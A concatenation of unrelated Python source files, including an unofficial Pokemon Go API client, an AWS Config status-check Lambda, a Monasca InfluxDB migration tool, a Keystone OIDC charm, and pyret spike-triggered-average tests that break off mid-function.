return self.state.start_time
def __getattr__(self, func):
async def function(**kwargs):
request = self.create_request()
getattr(request, func)(**kwargs)
return await request.call()
if func.upper() in RequestType.keys():
return function
else:
raise AttributeError('{} not known.'.format(func))
class PGoApiRequest:
log = getLogger(__name__)
def __init__(self, parent):
self.__parent__ = parent
self._req_method_list = []
self._req_platform_list = []
async def call(self):
parent = self.__parent__
auth_provider = parent.auth_provider
position = parent.position
try:
assert position[0] is not None and position[1] is not None
except AssertionError:
raise NoPlayerPositionSetException('No position set.')
request = RpcApi(auth_provider, parent.state)
while True:
try:
response = await request.request(parent.api_endpoint, self._req_method_list, self._req_platform_list, position, parent.device_info, parent._proxy, parent.proxy_auth)
break
except AuthTokenExpiredException:
self.log.info('Access token rejected! Requesting new one...')
await auth_provider.get_access_token(force_refresh=True)
except ServerApiEndpointRedirectException as e:
self.log.debug('API endpoint redirect... re-executing call')
parent.api_endpoint = e.endpoint
# cleanup after call execution
self._req_method_list = []
return response
def list_curr_methods(self):
for i in self._req_method_list:
print("{} ({})".format(RequestType.Name(i), i))
def __getattr__(self, func):
func = func.upper()
def function(**kwargs):
self.log.debug('Creating a new request...')
try:
if func in RequestType.keys():
if kwargs:
self._req_method_list.append((RequestType.Value(func), kwargs))
self.log.debug("Arguments of '%s': \n\r%s", func, kwargs)
else:
self._req_method_list.append(RequestType.Value(func))
self.log.debug("Adding '%s' to RPC request", func)
elif func in PlatformRequestType.keys():
if kwargs:
self._req_platform_list.append((PlatformRequestType.Value(func), kwargs))
self.log.debug("Arguments of '%s': \n\r%s", func, kwargs)
else:
self._req_platform_list.append(PlatformRequestType.Value(func))
self.log.debug("Adding '%s' to RPC request", func)
except ValueError:
raise AttributeError('{} not known.'.format(func))
return self
return function
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import boto3
from botocore.config import Config
import time
class ConfigRecordersCheck(object):
def __init__(self, accountid):
self.accountid = accountid
self.config = Config(
signature_version='v4',
retries={
'max_attempts': 10,
'mode': 'standard',
}
)
self.sts_connection = boto3.client(
'sts', config=self.config)
self.cloudwatch = boto3.client(
'cloudwatch', config=self.config, region_name='us-east-1')
self.AWSConfigRecordersTotal = 0
self.AWSConfigRecordersEnabled = 0
def GetRegionsfromAccount(self):
print("account:", self.accountid)
acct_b = self.sts_connection.assume_role(
RoleArn="arn:aws:iam::" + self.accountid + ":role/AssumedFunctionRole",
RoleSessionName="cross_acct_lambda"
)
self.ACCESS_KEY = acct_b['Credentials']['AccessKeyId']
self.SECRET_KEY = acct_b['Credentials']['SecretAccessKey']
self.SESSION_TOKEN = acct_b['Credentials']['SessionToken']
self.ec2 = boto3.client(
'ec2',
aws_access_key_id=self.ACCESS_KEY,
aws_secret_access_key=self.SECRET_KEY,
aws_session_token=self.SESSION_TOKEN,
config=self.config
)
filters = [
{
'Name': 'opt-in-status',
'Values': ['opt-in-not-required', 'opted-in']
}
]
self.regions = [region['RegionName'] for region in self.ec2.describe_regions(
Filters=filters)['Regions']]
self.PublishConfigStatustoCloudwatchforEveryRegion()
def PublishConfigStatustoCloudwatchforEveryRegion(self):
for self.region in self.regions:
awsconfig = boto3.client(
'config',
aws_access_key_id=self.ACCESS_KEY,
aws_secret_access_key=self.SECRET_KEY,
aws_session_token=self.SESSION_TOKEN,
region_name=self.region,
config=self.config
)
try:
self.config_recorder_response = awsconfig.describe_configuration_recorder_status()
print("region:", self.region)
response = self.config_recorder_response["ConfigurationRecordersStatus"]
print("len of response", len(response))
if len(response) > 0:
index = 0
self.AWSConfigRecordersTotal += 1
print("Value of recording:",
response[index]['recording'])
if response[index]['recording'] == True:
print("SUCCESS: {}".format(response))
print("SUCCESS: {}".format(
response[index]['lastStatus']))
print("PUBLISHING SUCCESS")
self.AWSConfigRecordersEnabled += 1
response = self.cloudwatch.put_metric_data(
MetricData=[
{
'MetricName': 'AWSConfigRecordersStatusFlag',
'Dimensions': [
{
'Name': "AccountId",
'Value': self.accountid
},
{
'Name': "Region",
'Value': self.region
},
],
'Value': 1
},
],
Namespace='AWSConfigStatus'
)
else:
print("PUBLISHING FAILURE")
response = self.cloudwatch.put_metric_data(
MetricData=[
{
'MetricName': 'AWSConfigRecordersStatusFlag',
'Dimensions': [
{
'Name': "AccountId",
'Value': self.accountid
},
{
'Name': "Region",
'Value': self.region
},
],
'Value': 0
},
],
Namespace='AWSConfigStatus'
)
except Exception as e:
print(e)
print("PUBLISHING SUMMARY")
cloudwatch = boto3.client(
'cloudwatch', config=self.config, region_name='us-east-1')
response = cloudwatch.put_metric_data(
MetricData=[
{
'MetricName': 'TotalAWSConfigRecordersEnabled',
'Dimensions': [
{
'Name': "AccountId",
'Value': self.accountid
}
],
'Value': self.AWSConfigRecordersTotal
}
],
Namespace='AWSConfigStatus'
)
response = cloudwatch.put_metric_data(
MetricData=[
{
'MetricName': 'TotalRegions',
'Dimensions': [
{
'Name': "AccountId",
'Value': self.accountid
}
],
'Value': len(self.regions)
}
],
Namespace='AWSConfigStatus'
)
response = self.cloudwatch.put_metric_data(
MetricData=[
{
'MetricName': 'AWSConfigRecordersRunning',
'Dimensions': [
{
'Name': "AccountId",
'Value': self.accountid
}
],
'Value': self.AWSConfigRecordersEnabled
}
],
Namespace='AWSConfigStatus'
)
def lambda_handler(event, context):
_start = time.time()
print('## EVENT')
print(event)
print("I am here", event["detail"]["aws_config_status_check_account"])
accid = event["detail"]["aws_config_status_check_account"]
awsconfigcheck = ConfigRecordersCheck(accid)
awsconfigcheck.GetRegionsfromAccount()
print("Sequential execution time: %s seconds",
time.time() - _start)
# TODO implement
return {
"statusCode": 200,
"headers": {
"Content-Type": "application/json"
},
"body": json.dumps({
"Response ": "SUCCESS"
}, default=str)
}
|
# -*- coding: utf-8 -*- #
DEBUG = True
TEMPLATE_DEBUG = DEBUG
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en'
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = False
LANGUAGES = (
('en', u'English'),
# ('he', u'Hebrew'),
# ('ru', u'Russian'),
)
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
TEMPLATE_DIRS = (
'templates',
)
INSTALLED_APPS = (
)
SECRET_KEY = 'SECRET_KEY'
|
# (C) Copyright 2019 StackHPC Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Monasca InfluxDB tool for migration to database per tenant
Used to move data from monolithic database e.g. `monasca` to a database per
tenant model, e.g. `monasca_<tenant_id>`.
Please see the included README.rst for more details about creating an
appropriate configuration file.
"""
import os
import re
import sys
from monasca_persister import config
from monasca_persister.repositories.influxdb import metrics_repository
from oslo_config import cfg
from oslo_log import log
LOG = log.getLogger(__name__)
MIGRATE_QUERY = ('SELECT * INTO "{target_db}"..:MEASUREMENT'
' FROM "{measurement}"'
' WHERE _tenant_id=\'{tenant_id}\''
' AND time > {lower_time_offset}'
' AND time <= {upper_time_offset}'
' GROUP BY *')
class MigrationHelper(object):
def __init__(self):
repo = metrics_repository.MetricInfluxdbRepository()
self.conf = repo.conf
self.client = repo._influxdb_client
self.client.switch_database(self.conf.influxdb.database_name)
def _migrate(self, measurement, tenant_id, start_time_offset,
end_time_offset, retention_policy={}, time_unit='w',
db_per_tenant=True, **kwargs):
total_written = 0
first_upper_time_offset = None
last_lower_time_offset = None
time_offset = start_time_offset
if db_per_tenant:
target_db = "{}_{}".format(self.conf.influxdb.database_name, tenant_id)
self.client.create_database(target_db)
if retention_policy:
self.client.create_retention_policy(database=target_db, **retention_policy)
LOG.info(' into {}:'.format(target_db))
while end_time_offset > 0 and time_offset < end_time_offset:
lower_time_offset = 'now()-{}{}'.format(time_offset + 1, time_unit)
upper_time_offset = 'now()-{}{}'.format(time_offset, time_unit)
if not first_upper_time_offset:
first_upper_time_offset = upper_time_offset
migrate_query = MIGRATE_QUERY.format(
target_db=target_db,
measurement=measurement,
tenant_id=tenant_id,
lower_time_offset=lower_time_offset,
upper_time_offset=upper_time_offset,
)
LOG.debug(migrate_query)
written = next(self.client.query(migrate_query).get_points('result')).get('written')
total_written += written
time_offset += 1
if written > 0:
last_lower_time_offset = lower_time_offset
LOG.info(" migrated {} entries from {} -> {} (cumulative {})".format(
written,
lower_time_offset,
upper_time_offset,
total_written,
))
LOG.info(" finished migrating a total of {} entries from {} -> {}.".format(
total_written,
last_lower_time_offset,
first_upper_time_offset,
))
def get_measurements(self, fname):
measurements = []
if fname:
with open(fname, 'a+') as f:
measurements = [line.strip() for line in f.readlines()]
if not measurements:
result = self.client.query('SHOW MEASUREMENTS').get_points('measurements')
measurements = [m.get('name') for m in result]
if fname:
with open(fname, 'w') as f:
for r in measurements:
f.write(r + '\n')
return measurements
def get_tenancies(self, measurements):
result = self.client.query("SHOW TAG VALUES WITH KEY = _tenant_id")
return {m: [t.get('value') for t in result.get_points(m)] for m in measurements}
def get_complete(self, fname):
if fname:
with open(fname, 'a+') as fd:
return {line.strip() for line in fd.readlines()}
else:
return {}
def migrate(self,
tenant_defaults={},
default_start_time_offset=0, # Default: now
default_end_time_offset=520, # Default: 10 years
skip_regex=[],
measurements_file=None, success_file=None, failure_file=None, **kwargs):
measurements = self.get_measurements(measurements_file)
tenancy = self.get_tenancies(measurements)
done = self.get_complete(success_file)
default_rp = {}
hours = self.conf.influxdb.default_retention_hours
if hours > 0:
rp = '{}h'.format(hours)
default_rp = dict(name=rp, duration=rp, replication='1', default=True)
skip = set()
fail = set()
if failure_file:
if os.path.exists(failure_file):
os.remove(failure_file)
filtered_measurements = []
for measurement in measurements:
if any([f.match(measurement) for f in skip_regex]):
skip.add(measurement)
LOG.debug('Skipping {} because it matches a skip regex.'.format(measurement))
continue
elif measurement in done:
LOG.debug('Skipping {} because its already done.'.format(measurement))
continue
else:
filtered_measurements.append(measurement)
for i, measurement in enumerate(filtered_measurements):
LOG.info('Migrating {}'.format(measurement))
try:
for tenant_id in tenancy.get(measurement):
start_time_offset = tenant_defaults.get(
tenant_id, {}).get('start_time_offset_override',
default_start_time_offset)
end_time_offset = tenant_defaults.get(
tenant_id, {}).get('end_time_offset_override',
default_end_time_offset)
# NOTE (brtknr): Ensure that the default upper and lower
# time offsets are respected during migration by the
# projects with custom retention policies.
start_time_offset = max(default_start_time_offset,
start_time_offset)
end_time_offset = min(default_end_time_offset,
end_time_offset)
retention_policy = tenant_defaults.get(
tenant_id, {}).get('rp', default_rp)
self._migrate(measurement, tenant_id,
start_time_offset=start_time_offset,
end_time_offset=end_time_offset,
retention_policy=retention_policy, **kwargs)
if success_file:
with open(success_file, 'a+') as fd:
fd.write('{}\n'.format(measurement))
done.add(measurement)
except Exception as e:
LOG.error(e)
if failure_file:
with open(failure_file, 'a+') as fe:
fe.write('{}\t{}\n'.format(measurement, e))
fail.add(measurement)
LOG.info("{}/{} (done {} + skip {} + fail {})/{}".format(
i + 1, len(filtered_measurements), len(done), len(skip),
len(fail), len(measurements)))
def main():
CONF = cfg.CONF
cli_opts = [
cfg.StrOpt('migrate-time-unit', choices=['h', 'd', 'w'], default='w',
help='Unit of time, h=hour, d=day, w=week (default: "w").'),
cfg.IntOpt('migrate-start-time-offset', default=0,
help='Start time offset in the given unit of time (default: 0).'),
cfg.IntOpt('migrate-end-time-offset', default=520,
help='End time offset in the given unit of time (default: 520).'),
cfg.DictOpt('migrate-retention-policy', default={},
help=('Custom retention policy for projects in the provided'
'time unit. (e.g. project-id-x:2,project-id-y:4)')),
cfg.ListOpt('migrate-skip-regex', default=[],
help=('Skip metrics that match this comma separated list of regex patterns.'
'(e.g. ^log\\\\..+,^cpu\\\\..+ to skip metrics beginning with log.)')),
]
CONF.register_cli_opts(cli_opts)
config.parse_args("Monasca InfluxDB database per tenant migration tool")
# Configure custom retention policy for your existing projects. For
# example, rp2w is a retention policy of two weeks which we can assign to
# project example-project-id.
tenant_defaults = dict()
for k, v in CONF.migrate_retention_policy.items():
if v.isdigit():
rp = '{}{}'.format(v, CONF.migrate_time_unit)
tenant_defaults[k] = dict(
end_time_offset_override=int(v),
rp=dict(name=rp, duration=rp, replication='1', default=True),
)
LOG.info('Project {} will be applied retention policy: {}.'.format(k, rp))
else:
raise ValueError('Retention policy for project {} must be an'
'integer of given time unit. Current value:'
'{}.'.format(k, v))
skip_regex = []
for p in CONF.migrate_skip_regex:
skip_regex.append(re.compile(str(p)))
LOG.info('Metrics matching pattern "{}" will be skipped.'.format(p))
helper = MigrationHelper()
helper.migrate(skip_regex=skip_regex,
tenant_defaults=tenant_defaults,
default_end_time_offset=CONF.migrate_end_time_offset,
default_start_time_offset=CONF.migrate_start_time_offset,
time_unit=CONF.migrate_time_unit,
measurements_file='migrate-measurements',
success_file='migrate-success',
failure_file='migrate-failure')
return 0
if __name__ == "__main__":
sys.exit(main())
|
#
# Copyright 2017 Canonical Ltd
# Copyright 2020 Consortium GARR
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import charmhelpers.core as core
import charmhelpers.core.host as ch_host
import charmhelpers.core.hookenv as hookenv
import charmhelpers.contrib.openstack.templating as os_templating
import charms_openstack.charm
import charms_openstack.adapters
import os
import subprocess
# the /etc/apache2/mellon directory is automatically parsed by keystone
# see https://github.com/openstack/charm-keystone/commit/6f3751cc96a910b07a122171cf43eee0b2852ecb
CONFIGS = (OIDC_LOCATION_CONFIG, OIDC_CONF) = [os.path.join('/etc/apache2/mellon/',
'sp-location-oidc.conf'),
os.path.join('/etc/apache2/conf-enabled/',
'oidc.conf')]
class KeystoneOIDCConfigurationAdapter(
charms_openstack.adapters.ConfigurationAdapter):
def __init__(self, charm_instance=None):
super().__init__(charm_instance=charm_instance)
self._validation_errors = {}
@property
def validation_errors(self):
return {k: v for k, v in
self._validation_errors.items() if v}
@property
def remote_id_attribute(self):
return "HTTP_OIDC_ISS"
@property
def oidc_location_config(self):
return OIDC_LOCATION_CONFIG
@property
def oidc_conf(self):
return OIDC_CONF
@property
def websso_auth_path(self):
return ('/v3/auth/OS-FEDERATION/websso/{}'.format(
self.protocol_name
))
@property
def websso_auth_protocol_path(self):
return ('/v3/OS-FEDERATION/identity_providers/.*?'
'/protocols/{}/auth'.format(
self.protocol_name
))
@property
def websso_auth_idp_protocol_path(self):
return ('/v3/auth/OS-FEDERATION/identity_providers'
'/{}/protocols/{}/websso'.format(
self.idp_name,
self.protocol_name
))
class KeystoneSAMLOIDCCharm(charms_openstack.charm.OpenStackCharm):
# Internal name of charm
service_name = name = 'keystone-oidc'
# Package to derive application version from
version_package = 'keystone'
# First release supported
release = 'stein'
release_pkg = 'keystone-common'
# Required relations
required_relations = [
'keystone-fid-service-provider',
'websso-fid-service-provider']
# List of packages to install for this charm
packages = ['libapache2-mod-auth-openidc']
configuration_class = KeystoneOIDCConfigurationAdapter
group = 'www-data'
restart_map = {
OIDC_LOCATION_CONFIG: [],
OIDC_CONF: [],
}
def configuration_complete(self):
"""Determine whether sufficient configuration has been provided
via charm config options and resources.
:returns: boolean indicating whether configuration is complete
"""
required_config = {
'oidc-claim-prefix': self.options.oidc_claim_prefix,
'oidc-response-type': self.options.oidc_response_type,
'oidc-scope': self.options.oidc_scope,
'oidc-provider-metadata-url': self.options.oidc_provider_metadata_url,
'oidc-client-id': self.options.oidc_client_id,
'oidc-client-secret': self.options.oidc_client_secret,
'oidc-crypto-passphrase': self.options.oidc_crypto_passphrase,
'oidc-redirect-uri': self.options.oidc_redirect_uri,
'idp-name': self.options.idp_name,
'protocol-name': self.options.protocol_name,
}
return all(required_config.values())
def custom_assess_status_check(self):
"""Custom asses status.
Check the configuration is complete.
"""
if not self.configuration_complete():
errors = [
'{}: {}'.format(k, v)
for k, v in self.options.validation_errors.items()]
status_msg = 'Configuration is incomplete. {}'.format(
','.join(errors))
return 'blocked', status_msg
# Nothing to report
return None, None
def render_config(self, *args):
"""
Render Service Provider configuration file to be used by Apache
and provided to idP out of band to establish mutual trust.
"""
owner = 'root'
group = 'www-data'
# group read and exec is needed for mellon to read the rendered
# files, otherwise it will fail in a cryptic way
dperms = 0o650
# file permissions are a bit more restrictive than defaults in
# charm-helpers but directory permissions are the main protection
# mechanism in this case
fileperms = 0o440
# ensure that a directory we need is there
ch_host.mkdir('/etc/apache2/mellon', perms=dperms, owner=owner,
group=group)
core.templating.render(
source='apache-oidc-location.conf',
template_loader=os_templating.get_loader(
'templates/', self.release),
target=self.options.oidc_location_config,
context=self.adapters_class(args, charm_instance=self),
owner=owner,
group=group,
perms=fileperms
)
core.templating.render(
source='oidc.conf',
template_loader=os_templating.get_loader(
'templates/', self.release),
target=self.options.oidc_conf,
context=self.adapters_class(args, charm_instance=self),
owner=owner,
group=group,
perms=fileperms
)
def remove_config(self):
for f in self.restart_map.keys():
if os.path.exists(f):
os.unlink(f)
def enable_module(self):
subprocess.check_call(['a2enmod', 'auth_openidc'])
def disable_module(self):
subprocess.check_call(['a2dismod', 'auth_openidc'])
|
#!/usr/bin/env python3
"""A script to do diagnostic checks on reduced ghost data.
It displays several windows showing how good the fits are and a few other things
This script should be ran from within the finished reduction folder, which
should contain the 'calibrations/' directory that are needed and finished
reduction files (extracted profiles/barycentric corrected)
"""
from __future__ import division, print_function
import numpy as np
from ghostdr.ghost import polyfit
import glob
import os
import sys
import astropy.io.fits as pyfits
import ghostdr.ghost.lookups as lookups
import ghostdr.ghost.lookups.polyfit_dict as polyfit_dict
import pylab as pl
from cycler import cycler
import input_locations
user='joao'
def plot_arcs(arc_data, thar_spec, w_map, title):
""" Function used to plot two panels, one containing the extracted arc
with the ThAr lamp spectrum superimposed, and one containing the difference
between the two, to look for particularly bad regions of the fit.
Parameters
----------
arc_data:
"""
pl.rc('axes', prop_cycle=(cycler('color', ['b', 'r'])))
f, axes = pl.subplots(3, 1, sharex='all')
f.suptitle(title)
# We always have 3 objects
for obj in range(3):
axes[obj].plot(w_map.T, arc_data[:, :, obj].T)
axes[obj].set_title('Object %s' % (str(obj + 1)))
thar_range = np.where((thar_spec[0] > w_map.min())
& (thar_spec[0] < w_map.max()))
thar_spec[1] = thar_spec[1] * (arc_data[:, :, obj].max() /
thar_spec[1][thar_range].max())
axes[obj].plot(thar_spec[0][thar_range], thar_spec[1][thar_range],
ls='-.',
color='green')
pl.show()
# Let's start by checking the fits. We use the same method as the slider adjust
# and let the user check things individually.
flat_list = glob.glob('calibrations/processed_flat/*flat.fits')
arc_list = glob.glob('calibrations/processed_arc/*arc.fits')
modes = ['high', 'std']
cams = ['blue', 'red']
# Now cycle through available modes. or just the ones required
# by detecting particular keywords in the sys arguments.
if len(sys.argv) > 1:
if 'high' in sys.argv:
modes = ['high']
if 'std' in sys.argv:
modes = ['std']
if 'red' in sys.argv:
cams = ['red']
if 'blue' in sys.argv:
cams = ['blue']
for mode in modes:
for cam in cams:
files = input_locations.Files(user=user, mode=mode, cam=cam)
ghost = polyfit.ghost.GhostArm(cam, mode=mode)
print('Inspecting flat and arc fits from the %s camera in %s mode' %
(cam, mode))
# Find the default models for things not inspected
rotparams = files.rotparams
specparams = files.specparams
spatparams = files.spatparams
wparams = files.waveparams
flat_file_location = [value for value in flat_list if cam in value
and mode in value][0]
flat_file = pyfits.open(flat_file_location)
print('Inspecting file %s' % (flat_file_location))
xparams = flat_file['XMOD'].data
dummy = ghost.spectral_format_with_matrix(xparams, wparams,
spatparams, specparams,
rotparams)
flat_conv = ghost.slit_flat_convolve(flat_file['SCI'].data)
plot_title = 'Convolution plot for camera %s in %s mode.' % (cam, mode)
adjusted_params=ghost.manual_model_adjust(flat_conv,
model = 'position',
xparams = xparams,
percentage_variation = 10,
title = plot_title)
plot_title='Regular flat for camera %s in %s mode.' % (cam, mode)
adjusted_params=ghost.manual_model_adjust(flat_file['SCI'].data,
model='position',
xparams=xparams,
percentage_variation=10,
title=plot_title)
# Now the arcs
arcs_list=[value for value in arc_list
if cam in value and mode in value]
for arc in arcs_list:
print('Inspecting file %s' % (arc))
arc_file=pyfits.open(arc)
wparams=arc_file['WFIT'].data
arc_data=arc_file['SCI'].data
dummy=ghost.spectral_format_with_matrix(xparams, wparams,
spatparams, specparams,
rotparams)
plot_title='Arc %s with superimposed template in green.' % (arc)
thar_spec = files.thar_spectrum(files.arclinefile)
plot_arcs(arc_data, thar_spec, ghost.w_map, title=plot_title)
|
from .encoding_controller import blp
|
from django.views.generic import TemplateView
class HomeView(TemplateView):
template_name = 'main/home.html'
|
from fidget.backend.QtWidgets import QHBoxLayout
from fidget.widgets import FidgetMinimal, FidgetInt, FidgetTuple, inner_fidget, SimplePlainEdit
from fidget.tests.gui.__util__ import test_as_main
@test_as_main()
class MinInt(FidgetMinimal):
MAKE_TITLE = True
OUTER_TEMPLATE = SimplePlainEdit.template('outer')
@inner_fidget('sample')
class _(FidgetTuple):
MAKE_TITLE = False
LAYOUT_CLS = QHBoxLayout
MAKE_PLAINTEXT = True
INNER_TEMPLATES = [
FidgetInt.template('X'),
FidgetInt.template('Y'),
]
|
# -*- coding: utf-8 -*-
##############################################
# The MIT License (MIT)
# Copyright (c) 2017 Kevin Walchko
# see LICENSE for full details
##############################################
from collections import namedtuple
import time
class Data(namedtuple('Data', 'data timestamp')):
"""
Generic data container with a timestamp.
data = tuple of data
timestamp = from time.time(), where it is measured in seconds
"""
__slots__ = ()
def __new__(cls, d, ts=None):
if ts:
return cls.__bases__[0].__new__(cls, d, ts)
else:
return cls.__bases__[0].__new__(cls, d, time.time())
|
####
# plot_creation.py
#
# Functions will be in charge of creating plots using matplotlib
# and then converting them into html string so that they can be
# posted onto the webpages as images
###
import pandas as pd
import matplotlib
import matplotlib.figure as figure
import base64
from io import BytesIO
# Function creates html string given a figure.Figure() object
# @para fig:
# @return: html string that will be used to load the image
# this string can be inserted in src for html script. Ex:
# <img src='HTML_STRING'/>
def create_html_string(fig):
html_string = ""
buf = BytesIO()
fig.savefig(buf, format="png")
# Embed the result in the html output
data = base64.b64encode(buf.getbuffer()).decode("ascii")
html_string = f'data:image/png;base64,{data}'
return html_string
# Creates scatter plot that compares x and y axis parameters
# @para x: array of x-axis values
# @para x_l: string of x-axis value
# @para y: array of y-axis values
# @para y_l: string of y-axis value
# @para title: string title of plot
# @return: html string that will load the image (refer to create_html_string()
# function for more details)
def create_scatter_html(x, x_l, y, y_l, title):
fig = figure.Figure()
scatter = fig.add_subplot()
scatter.scatter(x=x, y=y)
scatter.set_xlabel(x_l)
scatter.set_ylabel(y_l)
scatter.set_title(title)
# Create and return html string
return create_html_string(fig)
# Creates barchart that compares given x paramaters, graphs output
# their heights based on height instance
# @para x: array of x-axis values
# @para x_l: string of x-axis value
# @para height: array of heights for given x values
# @para height_l: string of label for heights
# @para title: string title of plot
# @return: html string that will load the image (refer to create_html_string()
# function for more details)
def create_bar_html(x, x_l, height, height_l, title):
fig = figure.Figure()
bar = fig.add_subplot()
bar.bar(x=x, height=height)
bar.set_xlabel(x_l)
bar.set_ylabel(height_l)
bar.set_title(title)
# Create and return html string
return create_html_string(fig) |
from lib import action
class KeycloakDeleteClientRoleAction(action.KeycloakBaseAction):
def run(self, role_name):
self.keycloak_admin.delete_client_role(role_name=role_name)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"Definition of classic algorithms"
# pylint: disable=invalid-name,unused-argument
from __future__ import absolute_import
from tvm.te.hybrid import script
from tvm.runtime import convert
from .. import strategy
from .. import op as _reg
from ..op import OpPattern, register_pattern
from ..op import register_strategy
# topk
register_strategy("dyn.topk", strategy.topk_strategy)
register_pattern("dyn.topk", OpPattern.OPAQUE)
@script
def _topk_shape_func_input_data(data, k, axis):
ndim = len(data.shape)
val_out = output_tensor((ndim,), "int64")
indices_out = output_tensor((ndim,), "int64")
for i in const_range(ndim):
if i != axis:
val_out[i] = int64(data.shape[i])
indices_out[i] = int64(data.shape[i])
else:
if k[0] < 1:
val_out[i] = int64(data.shape[i])
indices_out[i] = int64(data.shape[i])
else:
val_out[i] = int64(k[0])
indices_out[i] = int64(k[0])
return val_out, indices_out
@_reg.register_shape_func("dyn.topk", True)
def topk_shape_func(attrs, inputs, _):
"""
Shape func for topk.
"""
axis = attrs.axis
if axis < 0:
axis += len(inputs[0].shape)
val_out, indices_out = \
_topk_shape_func_input_data(inputs[0], inputs[1], convert(axis))
ret_type = attrs.ret_type
if ret_type == "both":
ret = [val_out, indices_out]
elif ret_type == "values":
ret = [val_out]
else:
ret = [indices_out]
return ret
|
class Reference():
metadata = {}
def __init__(self, metadata: dict, figures: list):
self.metadata.update(metadata)
for fig in figures:
setattr(self, fig.name, fig)
class Figure():
"""
This is the base class for figure data.
"""
def __init__(self, name: str, lines: list):
self.name = name
self.lines = lines
class Line():
def __init__(self, x, y, label):
self.x = x
self.y = y
self.label = label |
"""test_filtertools.py
Test code for pyret's filtertools module.
(C) 2016 The Baccus Lab.
"""
import numpy as np
import pytest
from pyret import filtertools as flt
from pyret.stimulustools import slicestim
import utils
def test_ste():
"""Test computing a spike-triggered ensemble."""
np.random.seed(0)
time = np.arange(100)
spikes = np.array((30, 70))
stimulus = np.random.randn(100,)
filter_length = 5
ste = flt.ste(time, stimulus, spikes, filter_length)
for ix in spikes:
assert np.allclose(stimulus[ix - filter_length : ix], next(ste))
def test_sta():
"""Test computing a spike-triggered average."""
np.random.seed(0)
time = np.arange(100)
spikes = np.array((0, 30, 70))
stimulus = np.random.randn(100,)
filter_length = 5
sta, tax = flt.sta(time, stimulus, spikes, filter_length)
tmp = np.zeros(sta.shape)
for ix in spikes[1:]: # Should ignore first spike, comes before filter_length frames
tmp += stimulus[ix - filter_length : ix]
tmp /= len(spikes)
assert np.allclose(tmp, sta)
assert np.allclose(tax, np.arange(-filter_length + 1, 1))
def test_sta_acausal():
"""Test computing a spike-triggered average with points before and
after the time of the spike.
"""
np.random.seed(0)
time = np.arange(100)
spikes = np.array((0, 30, 70))
stimulus = np.random.randn(100,)
nbefore, nafter = 5, 2
sta, tax = flt.sta(time, stimulus, spikes, nbefore, nafter)
tmp = np.zeros(sta.shape)
for ix in spikes[1:]: # Should ignore first spike, comes before filter_length frames
tmp += stimulus[ix - nbefore : ix + nafter]
tmp /= len(spikes)
assert np.allclose(tmp, sta)
assert np.allclose(tax, np.arange(-nbefore + 1, nafter + 1))
def test_empty_sta():
"""Test that an empty with no spikes returns an array of nans"""
np.random.seed(0)
time = np.arange(100)
spikes = np.array(())
stimulus = np.random.randn(100,)
filter_length = 5
sta, _ = flt.sta(time, stimulus, spikes, filter_length)
assert np.all(np.isnan(sta))
def test_stc():
"""Test computation of a spike-triggered covariance matrix."""
np.random.seed(0)
# random spike times an white noise stimulus, so STC should be close to identity
npoints = 100000
nspikes = 1000
time = np.arange(npoints)
spikes = np.random.randint(0, npoints, (nspikes,))
stimulus = np.random.randn(npoints,)
filter_length = 10
tmp = flt.stc(time, stimulus, spikes, filter_length)
atol = 0.1
assert np.allclose(tmp, np.eye(filter_length), atol=atol)
def test_empty_stc():
"""Test STC with no spike returns array of nans"""
np.random.seed(0)
# random spike times an white noise stimulus, so STC should be close to identity
npoints = 100
nspikes = 0
time = np.arange(npoints)
spikes = np.random.randint(0, npoints, (nspikes,))
stimulus = np.random.randn(npoints,)
filter_length = 10
tmp = flt.stc(time, stimulus, spikes, filter_length)
assert np.all(np.isnan(tmp))
def test_decompose_2d():
"""Tests computing a rank-1 approximation to a 2D filter.
Note that this tests both ``filtertools.decompose()`` and
``filtertools.lowranksta()``.
"""
np.random.seed(0)
filter_length = 50
nx = 10
def gaussian(x, mu, sigma):
return np.exp(-((x - mu) / sigma)**2) / np.sqrt(sigma * 2 * np.pi)
temporal = gaussian(np.linspace(-3, 3, filter_length), -1, 1.5)
spatial = gaussian(np.linspace(-3, 3, nx), 0, 1.0)
true_filter = np.outer(temporal, spatial)
noise_std = 0.01 * (temporal.max() - temporal.min())
true_filter += np.random.randn(*true_filter.shape) * noise_std
s, t = flt.decompose(true_filter)
# s/t are unit vectors, scale them and the inputs
s -= s.min()
s /= s.max()
t -= t.min()
t /= t.max()
temporal -= temporal.min()
temporal /= temporal.max()
spatial -= spatial.min()
spatial /= spatial.max()
tol = 0.1
assert np.allclose(temporal, t, atol=tol)
assert np.allclose(spatial, s, atol=tol)
def test_decompose_3d():
"""Tests computing a rank-1 approximation to a 3D filter.
Note that this tests both ``filtertools.decompose()`` and
``filtertools.lowranksta()``.
"""
np.random.seed(0)
filter_length = 50
nx, ny = 10, 10
def gaussian(x, mu, sigma):
